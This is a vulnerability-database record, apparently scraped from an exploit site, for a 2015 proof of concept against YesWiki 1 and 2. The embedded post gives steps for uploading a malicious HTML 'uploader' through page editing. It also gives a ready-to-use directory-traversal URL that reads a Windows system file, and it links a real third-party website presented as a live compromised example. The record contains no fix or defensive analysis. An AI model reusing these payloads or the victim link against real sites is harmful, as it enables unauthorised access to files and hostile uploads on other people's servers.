Description
YesWiki versions 1 and 2 suffers from remote arbitrary file upload and directory traversal vulnerabilities.
{"id": "1337DAY-ID-24718", "type": "zdt", "bulletinFamily": "exploit", "title": "YesWiki 1 / 2 File Upload / Directory Traversal Vulnerabilities", "description": "YesWiki versions 1 and 2 suffers from remote arbitrary file upload and directory traversal vulnerabilities.", "published": "2015-12-13T00:00:00", "modified": "2015-12-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/24718", "reporter": "indoushka", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-20T00:14:40", "viewCount": 9, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "sourceHref": "https://0day.today/exploit/24718", "sourceData": "0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \r\n| # Title : yeswiki v1+2 unrestricted file upload Vulnerability\r\n| # Author : indoushka\r\n| # email : [email\u00a0protected]\r\n| # Dork : (>^_^)> Galope sous YesWiki <(^_^<)\r\n| # Tested on: windows 8.1 Fran\u00e7ais V.(Pro)\r\n| # Download : http://www.yeswiki.net/\r\n========================================================================\r\n\r\npoc:\r\n\r\nI- unrestricted file upload :\r\n\r\nCreat or edit pages and join your Ev!l uploader .html\r\ngo to http://127.0.0.1/yeswiki/files/diaporama/ 3v!l-up.html or http://127.0.0.1/yeswiki/files/\r\n\r\nLive : http://maraichagesolvivant.org/files/PagePrincipale_up_20151203204715_20151207164247.html_\r\n\r\nII - Directory Traversal :\r\n\r\nhttp://127.0.0.1/yeswiki/wakka.php?wikiUrl=../../../../../../../../../../windows/win.ini\r\n\r\nGreetz : \r\njericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/\r\nHussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be\n\n# 0day.today [2018-03-19] #", "_state": {"dependencies": 1645293656, "score": 1659766679, "epss": 1678811959}}
{}
YesWiki 1 / 2 File Upload / Directory Traversal Vulnerabilities